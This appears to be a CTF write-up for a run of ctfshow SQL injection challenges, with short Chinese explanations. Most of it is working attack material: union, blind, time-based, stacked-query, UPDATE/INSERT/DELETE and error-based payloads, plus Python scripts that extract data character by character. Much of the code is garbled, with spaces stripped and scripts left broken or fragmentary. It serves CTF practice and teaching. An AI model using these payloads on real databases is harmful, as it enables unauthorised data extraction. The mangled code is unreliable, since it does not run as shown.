1' union select group_concat(schema_name),2 from information_schema.schemata%23 1'unionselect group_concat(table_name),2from information_schema.tables where table_schema="ctfshow_web"%23
1' union select group_concat(column_name),2 from information_schema.columns where table_name="ctfshow_user2"%23 1'unionselect group_concat(password),2from ctfshow_user2%23
web173
-1' union select 1,database(),3 --+ -1'unionselect1,group_concat(table_name),3from information_schema.tables where table_schema='ctfshow_web'--+
-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='ctfshow_user3' --+ -1'unionselect1,2,to_base64(password) from ctfshow_user3 --+
方法一样,换个函数
web174
没有数据页了,那就盲注一下吧。表名和列名可以直接猜到,所以测一下就能打。
1' and 1=if(ascii(substr((select group_concat(password) from ctfshow_user4),1,1))>1,1,0)--+
defrepisTrue(char): payload=f'''1'and'{char}'='{char}''' r = requests.get(url+"?id="+payload) w = target.search(r.text) if w isnotNone: returnTrue returnFalse
if __name__ == '__main__': right = [] waf = [] for i inrange(32,127): if repisTrue(chr(i)): right.append((i, chr(i))) else: waf.append((i, chr(i))) print("right:", right) print("waf:", waf)
target="ctfshow{" for i inrange(100): for s in strings: payload=f"(ctfshow_user)where(pass)like'{target+s}%'" data={"tableName":payload} r=requests.post(url,data) if"$user_count = 1;"in r.text: target+=s print(target) break if s =="}": exit()
web184
利用 group by 对查询结果进行分组,再用 having 来筛选,写个脚本
selectcount(*) from ctfshow_user groupby pass having pass like0x63746673686f777b25;
defstr_to_hex(str): return''.join([hex(ord(c)).replace('0x', '') for c instr])
for i inrange(1, 50): for j in'0123456789abcdefghijklmnopqrstuvwxyz-{}': payload = "ctfshow_user a right join ctfshow_user b on b.pass like 0x{0}".format(str_to_hex(target + j + '%')) # print(payload) data = {'tableName': payload} r = requests.post(url=url, data=data) # print(r.text) if"$user_count = 43;"in r.text: target += j print(target) iflen(target) == 44: print(target + '}') exit()
url = 'http://50a0761d-8695-48df-bfe5-9410e5169332.challenge.ctf.show/select-waf.php' payload = 'ctfshow_user group by pass having pass like(concat({}))' target = 'ctfshow{'
defcreateNum(n): num = 'true' if n == 1: return'true' else: for i inrange(n - 1): num += "+true" return num
defcreateStrNum(c): str = '' str += 'chr(' + createNum(ord(c[0])) + ')' for i in c[1:]: str += ',chr(' + createNum(ord(i)) + ')' returnstr
whileTrue: i+=1 head=32 tail=127 while head+1<tail: mid=(head + tail) >> 1 # payload="-1' or if((ascii(substr((select database()),{0},1)))<{1},sleep(5),0)#".format(i,mid) # payload = "-1' or if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{0},1)))<{1},sleep(5),0)#".format( # i, mid) # ctfshow_flagxc # payload = "-1' or if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxc'),{0},1)))<{1},sleep(5),0)#".format( # i, mid) # id,flagaa payload = "-1' or if((ascii(substr((select flagaa from ctfshow_flagxc),{0},1)))<{1},sleep(5),0)#".format( i, mid)
whileTrue: i+=1 head=32 tail=127 while head+1<tail: mid=(head + tail) >> 1 # payload="'MQ==') or if ((ascii(substr((select database()),{0},1)))<{1},sleep(5),0)#".format(i,mid) # payload = "'MQ==') or if ((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{0},1)))<{1},sleep(5),0)#".format( # i, mid) # ctfshow_flagxcc # payload = "'MQ==') or if ((ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxcc'),{0},1)))<{1},sleep(5),0)#".format( # i, mid) # id,flagaac payload = "'MQ==') or if ((ascii(substr((select flagaac from ctfshow_flagxcc),{0},1)))<{1},sleep(5),0)#".format( i, mid)
whileTrue: i+=1 head=32 tail=127 while head+1<tail: mid=(head + tail) >> 1 # payload="1) or if ((ascii(substr((select database()),{0},1)))<{1},BENCHMARK(25000000, SHA2('test', 512)),0)#".format(i,mid) # payload = "1) or if ((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{0},1)))<{1},BENCHMARK(25000000, SHA2('test', 512)),0)#".format( # i, mid) # ctfshow_flagxccb # payload = "1) or if ((ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxccb'),{0},1)))<{1},BENCHMARK(25000000, SHA2('test', 512)),0)#".format( # i, mid) # id,flagaabc payload = "1) or if ((ascii(substr((select flagaabc from ctfshow_flagxccb),{0},1)))<{1},BENCHMARK(25000000, SHA2('test', 512)),0)#".format( i, mid)
whileTrue: i+=1 head=32 tail=127 while head+1<tail: mid=(head + tail) >> 1 # payload="1) or if ((ascii(substr((select database()),{0},1)))<{1},{2},0)#".format(i,mid,sleep) # payload = "1) or if ((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{0},1)))<{1},{2},0)#".format( # i, mid,sleep) # ctfshow_flagxc # payload = "1) or if ((ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxc'),{0},1)))<{1},{2},0)#".format( # i, mid,sleep) # id,flagaac payload = "1) or if ((ascii(substr((select flagaac from ctfshow_flagxc),{0},1)))<{1},{2},0)#".format( i, mid,sleep)
target="" i=0 right_time=0.8 sleep="(SELECT count(*) FROM information_schema.tables A, information_schema.schemata B, information_schema.schemata D, information_schema.schemata E, information_schema.schemata F,information_schema.schemata G, information_schema.schemata H,information_schema.schemata I)"
whileTrue: i+=1 head=32 tail=127 while head+1<tail: mid=(head + tail) >> 1 # payload="1) or if ((ascii(substr((select database()),{0},1)))<{1},{2},0)#".format(i,mid,sleep) # payload = "1) or if ((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{0},1)))<{1},{2},0)#".format( # i, mid,sleep) # ctfshow_flagxca # payload = "1) or if ((ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxca'),{0},1)))<{1},{2},0)#".format( # i, mid,sleep) # id,flagaabc payload = "1) or if ((ascii(substr((select flagaabc from ctfshow_flagxca),{0},1)))<{1},{2},0)#".format( i, mid,sleep)
target="" i=0 right_time=0.8 sleep="(SELECT count(*) FROM information_schema.tables A, information_schema.schemata B, information_schema.schemata D, information_schema.schemata E, information_schema.schemata F,information_schema.schemata G, information_schema.schemata H,information_schema.schemata I)" strings="_-{}"+string.ascii_uppercase+string.ascii_lowercase+string.digits
for i inrange(1,50): found = False for s in strings: temp_target = target + s # payload = "1) or if((left((select database()),{0})='{1}'),{2},0)-- +".format( # i, temp_target, sleep) # ctfshow # payload = "1) or if((left((select table_name from information_schema.tables where table_schema=database() limit 0,1),{0})='{1}'),{2},0)-- +".format( # i, temp_target, sleep) # ctfshow_flagxcac # payload = "1) or if((left((select column_name from information_schema.columns where table_name='ctfshow_flagxcac' limit 1,1),{0})='{1}'),{2},0)-- +".format( # i, temp_target, sleep) # flagaabcc payload = "1) or if((left((select flagaabcc from ctfshow_flagxcac limit 0,1),{0})='{1}'),{2},0)-- +".format( i, temp_target, sleep) # print(payload) data = { "ip": payload, "debug": 0 } start_time = time.time() r = requests.post(url, data) last_time = time.time() - start_time if last_time > right_time: # print("gogogo") target=temp_target print(target.lower()) found = True break
/api/?username=-1';PREPARE abcd from 0x73686f772020646174616261736573;execute abcd;# /api/?username=-1';PREPARE abcd from 0x73686F77207461626C6573;execute abcd;#
/api/?username=-1';PREPARE abcd from 0x73656C656374202A2066726F6D2063746673685F6F775F666C61676173;execute abcd;#
SELECT*FROM information_schema.Routines WHERE ROUTINE_NAME ='sp_name';
/api/?username=-1';PREPARE abcd from 0x73656C656374202A2066726F6D20696E666F726D6174696F6E5F736368656D612E526F7574696E6573;execute abcd;#
web228
/api/?username=-1';PREPARE a from 0x73656C656374202A2066726F6D2063746673685F6F775F666C616761736161 ;execute a;#
web229
/api/?username=-1';PREPARE abcd from 0x73686f772020646174616261736573;execute abcd;# /api/?username=-1';PREPARE abcd from 0x73686F77207461626C6573;execute abcd;#
/api/?username=-1';PREPARE abcd from 0x73656c656374202a2066726f6d20666c6167;execute abcd;#
web230
/api/?username=-1';PREPARE abcd from 0x73656c656374202a2066726f6d20666c61676161626278;execute abcd;#
web231
路由是/api/
// Both $password and $username are interpolated directly into the query text, which is the
// injection point this section relies on; binding them as parameters of a prepared statement
// instead of string interpolation would remove it.
$sql= "update ctfshow_user set pass = '{$password}' where username = '{$username}';";
update 注入:在改变密码的同时也把 username 改掉,把 SQL 语句插进去。
password=-1',username=(select group_concat(table_name) from information_schema.tables where table_schema=database())#&username=
password=-1',username=(select group_concat(column_name) from information_schema.columns where table_name='flaga')#&username=
password=-1',username=(select flagas from flaga)#&username=
有个槽点是,这个东西好像只能慢慢地去看回显。
web232
闭合md5即可
password='),username=(select group_concat(table_name) from information_schema.tables where table_schema=database())#&username=
password='),username=(select group_concat(column_name) from information_schema.columns where table_name='flagaa')#&username=
password='),username=(select flagass from flagaa)#&username=
web233
由于不能传入 ',这里需要绕过一下,但还是很简单:利用 \ 把 ' 转义掉即可。
password=\&username=,username=(select group_concat(table_name) from information_schema.tables where table_schema=database())#
password=\&username=,username=(select group_concat(column_name) from information_schema.columns where table_name='flag233333')#
password=\&username=,username=(select flagass233 from flag233333)#
web234
password=\&username=,username=(select group_concat(table_name) from information_schema.tables where table_schema=database())#
password=\&username=,username=(select group_concat(column_name) from information_schema.columns where table_name=0x666c6167323361)#
password=\&username=,username=(select flagass23s3 from flag23a)#
web235
用 mysql.innodb_index_stats 和 mysql.innodb_table_stats 查找表名
password=\&username=,username=(select group_concat(table_name) from mysql.innodb_table_stats where database_name=database())# banlist,ctfshow_user,flag23a1
password=\&username=,username=(select b from (select 1,2 as b,3 union select * from flag23a1 limit 1,1)a)#
这样写可能不太好看懂,我再写一个无列名注入的 payload
password=\&username=,username=(select target_column from (SELECT 1, 2 AS target_column, 3 UNION SELECT * FROM flag23a1 limit 1,1)temp)#
就很容易看懂了
web236
password=\&username=,username=(select group_concat(table_name) from mysql.innodb_index_stats where database_name=database())#
password=\&username=,username=(select b from (select 1,2 as b,3 union select * from flaga limit 1,2)a)#
web237
注入点在/api/insert.php
// $username and $password are interpolated directly into the VALUES clause, which is the
// injection point used below; passing them as bound parameters of a prepared statement
// would remove it.
$sql= "insert into ctfshow_user(username,pass) value('{$username}','{$password}');";
for a1 in"ab": for a2 in"ab": for a3 in"ab": for a4 in"ab": for a5 in"ab": payload='flag'+a1+a2+a3+a4+a5 data={ 'username':f"1',(select(flag)from({payload})))#", 'password':'1' } r=requests.post(url=url,data=data)
web241
// $id is interpolated unquoted into the WHERE clause, so any expression supplied as id runs
// as SQL (the time-based injection below depends on this); casting it to an integer or binding
// it as a prepared-statement parameter would remove the injection point.
$sql= "delete from ctfshow_user where id = {$id}";
target = "" i = 0 right_time = 0.8 sleep="(SELECT count(*) FROM information_schema.tables A, information_schema.schemata B, information_schema.schemata D, information_schema.schemata E, information_schema.schemata F,information_schema.schemata G, information_schema.schemata H,information_schema.schemata I)"
whileTrue: i += 1 head = 32 tail = 127 while head + 1 < tail: mid = (head + tail) >> 1 # payload="if((ascii(substr((select database()),{0},1)))<{1},{2},0)#".format(i,mid,sleep) # payload = "if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{0},1)))<{1},{2},0)#".format( # i, mid,sleep) # banlist,ctfshow_user,flag # payload = "if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),{0},1)))<{1},{2},0)#".format( # i, mid, sleep) # id,flag payload = "if((ascii(substr((select flag from flag),{0},1)))<{1},{2},0)#".format( i, mid ,sleep)
# print(payload) data = { "id": payload, } start_time = time.time() r = requests.post(url, data) last_time = time.time() - start_time if last_time > right_time: tail = mid # print("right") else: head = mid # print("wrong")
if head != 32: target += chr(head) print(target) else: break print(target)
/api/?id=1' or updatexml(1,concat(0x3d,mid((select group_concat(schema_name) from information_schema.schemata),32,32),0x3d),1)--+
/api/?id=1' or updatexml(1,concat(0x3d,mid((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'),1,32),0x3d),1)--+
/api/?id=1' or updatexml(1,concat(0x3d,mid((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flag'),1,32),0x3d),1)--+
/api/?id=1' or updatexml(1,concat(0x3d,mid((select group_concat(flag) from ctfshow_flag),1,32),0x3d),1)--+
/api/?id=1' or updatexml(1,concat(0x3d,mid((select group_concat(flag) from ctfshow_flag),32,32),0x3d),1)--+
web245
/api/?id=1' or extractvalue(1,concat(0x3d,mid((select group_concat(schema_name) from information_schema.schemata),32,32),0x3d))--+
/api/?id=1' or extractvalue(1,concat(0x3d,mid((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'),1,32),0x3d))--+
/api/?id=1' or extractvalue(1,concat(0x3d,mid((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagsa'),1,32),0x3d))--+
/api/?id=1' or extractvalue(1,concat(0x3d,mid((select group_concat(flag1) from ctfshow_flagsa),1,32),0x3d))--+
/api/?id=1' or extractvalue(1,concat(0x3d,mid((select group_concat(flag1) from ctfshow_flagsa),32,32),0x3d))--+
web246
报错原理:
MySQL 在执行 GROUP BY 时,会为每个不同的 group 创建一个临时表
rand() 会在查询执行过程中多次计算,而不是只计算一次
当 rand() 生成的值导致出现重复的键值时,MySQL 试图把重复键插入临时表,就会产生错误
所以有时候运气不好需要发好几次包才能成功
/api/?id=1' union select 1,count(*),concat(mid((select group_concat(schema_name) from information_schema.schemata),32,32),0x7e,floor(rand()*2))a from information_schema.tables group by a--+
/api/?id=1' union select 1,count(*),concat((select schema_name from information_schema.schemata limit 4,1),0x7e,floor(rand()*2))a from information_schema.tables group by a--+
limit、mid、right、left、substring 其实都是一样的。
/api/?id=1' union select 1,count(*),concat(mid((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'),1,32),0x7e,floor(rand()*2))a from information_schema.tables group by a--+
/api/?id=1' union select 1,count(*),concat(mid((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flags'),1,32),0x7e,floor(rand()*2))a from information_schema.tables group by a--+
/api/?id=1' union select 1,count(*),concat(mid((select group_concat(flag2) from ctfshow_flags),1,32),0x7e,floor(rand()*2))a from information_schema.tables group by a--+
web247
ceil() - 向上取整函数:ceil(x) 返回不小于 x 的最小整数,即向上取整。例如,ceil(3.14) 返回 4。
round() - 四舍五入函数:round(x) 返回最接近 x 的整数;如果有两个整数与 x 距离相等,则返回其中的偶数。例如,round(3.6) 返回 4,round(3.5) 返回 4,round(3.4) 返回 3。
?id=1' union select 1,count(*),concat(mid((select group_concat(schema_name) from information_schema.schemata),32,32),0x7e,round(rand()*2))a from information_schema.tables group by a--+
/api/?id=1' union select 1,count(*),concat(mid((select group_concat(schema_name) from information_schema.schemata),32,32),0x7e,ceil(rand()*2))a from information_schema.tables group by a--+
正常写就行,最后一句有个小细节:列名 flag? 要被正确解析,需要用反引号括起来。
/api/?id=1' union select 1,count(*),concat(mid((select `flag?` from ctfshow_flagsa),1,32),0x7e,ceil(rand()*2))a from information_schema.tables group by a--+
/api/?id=1' union select 1,count(*),concat(mid((select `flag?` from ctfshow_flagsa),32,32),0x7e,ceil(rand()*2))a from information_schema.tables group by a--+